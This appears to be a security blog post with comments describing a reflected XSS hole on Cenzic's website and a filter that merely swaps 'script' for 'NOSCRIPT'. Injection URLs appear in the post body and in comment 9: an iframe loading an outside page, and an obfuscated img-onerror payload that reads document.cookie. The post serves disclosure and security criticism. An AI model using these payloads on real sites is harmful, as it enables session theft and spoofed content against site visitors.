Cenzic 232 Patent
Paid Advertising
web application security lab

NOSCRIPT on Cenzic

Erwin Geirnaert sent me an amusing email today about one of the links that Ronald threw up. Yes, Cenzic has had a number of XSS holes, and yes, they have tried to fix them, but they have had some problems in their fixes. Here’s Erwin’s email:

I followed this link from http://www.0×000000.com/?i=372:
http://www.cenzic.com/products_services/download_hailstorm.php?camp=%22%3E%3Ciframe%20src=http://ha.ckers.org/scriptlet.html%20%3C

The HTML source:

<a href="/forms/hailstorm.php?id=3&camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"><img src="../images/products_services/btn_hailstorm_starter.gif" alt="Hailstorm Starter: Try for 45 Days" width="455" height="39" border="0"></a><br>

<a href="/forms/hailstorm.php?id=2&camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"><img src="../images/products_services/btn_try_hailstorm_7days.gif" alt="Hailstorm Core: Try for 7 Days" width="455" height="39" border="0"></a><br>

<a href="/forms/hailstorm.php?id=1&camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"><img src="../images/products_services/btn_buy_hailstorm.gif" alt="Hailstorm Core: Buy Today" width="455" height="39" border="0"></a><br>

So a page with the name NOSCRIPTlet.html will work, no?

Erwin was absolutely right, aaaabsolutely right. Cenzic attempted to mitigate the risk by changing the word “script” to “NOSCRIPT” which doesn’t do much in this case other than change the location of where the vector lives. So I went ahead and created exactly that file (NOSCRIPTlet.html) to prove the point. You cannot do simple substitutions like that and assume they will break every vector. This all comes in reaction to some rather scary patents they issued that appear to break every one else’s ability to work in the industry. Not good.

12 Responses to “NOSCRIPT on Cenzic”

  1. Ronald van den Heetkamp Says:

    Thanks RSnake, big props to you! ;)

    I didn’t even saw this was the case btw, I was in a hurry when I posted it. :)

  2. zeno Says:

    If you sell a product that finds xss, and your own site is vuln to xss, you deserve to have your hands and feet cut off for being a thief.

  3. digi7al64 Says:

    lmfao - It would cenzic have been poaching the biggest, baddest and brightest that myspace has to offer.

  4. Arian Says:

    While this is pretty hysterical, I get a sad gut-check when I think of the 50 + million dollars of investors’ money they are blowing on God Knows What….

    …besides fueling some crazy marketing machine.

    Seriously, this is disgusting. They are blowing millions of dollars making and selling pure crap to unsuspecting people, and they don’t even have a single employee who understands WEB APP SECURITY. I mean, read their blogs. XSS vs CSRF crap. Ridiculous. Stupid.

    Why don’t more people in the industry speak up? Cenzic is hurting *everyone*, all of us included, each time they clown a client into using paying them for a false impression of their security posture.

  5. Ronald van den Heetkamp Says:

    On the contrary what many people think, I’m no security scanner vendor. I work in the field and have my own sec. company, but we do pentesting by hand, and sometimes a few scripts only to automate stuff. So regarding the Cenzic’s patents, It does not affect me. But, I am sure that many companies are being hit by it in one way or another. My motto: If you are the best, you don’t have competition and you shouldn’t be afraid by it, let alone patent stuff which is killing the industry instead of making it more transparent.

    The XSS holes are just symbols, to show what is wrong with todays understanding of web application security. I’ll hope a few lessons can be learned, I had to learn ‘em also one way or the other.

  6. Jacky Says:

    Hello RSnake,

    This is a nice trick, but as far as I understand, you load a page in another domain (in this case, ha.ckers.org) using an IFRAME.
    That means that the script you load inside the IFRAME will not have access to the DOM of Cenzic’s website…

    Did I miss anything?

    Thanks,
    Jacky

  7. hackathology Says:

    cenzic boooooooooooooo!!#@#@

  8. RSnake Says:

    @Jacky - No you didn’t miss anything. That example vector indeed can only run JavaScript in another domain, but generally when there is one vector there are many more, so I wouldn’t say that site was safe based on that idea alone. It also makes SEO blackhat URL injection possible. Also, if done properly, that attack can easily be made into a convincing site using CSS (no JS required) to make people believe they are seeing something on Cenzic that is actually on another domain. Although not as bad, it’s still far from being a safe page.

  9. beford Says:

    http://www.cenzic.com/products_services/download_hailstorm.php?camp=%22%3E%3Cimg+src=404+onerror=eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,97,108,101,114,116,40,39,112,119,110,101,100,39,41))%3E%3Ctextarea%3E

  10. beford Says:

    ugh, it was stripped down by filters, ignore that,
    http://beford.org/cenzic.html

  11. Arian Says:

    Bedford — nice…

  12. funn Says:

    funny.

    i have to make a decision between spi, hailstorm and watchfire. and hailstorm is out! very lame, they are very very arrogant but not able to code a secure application. thats very lame.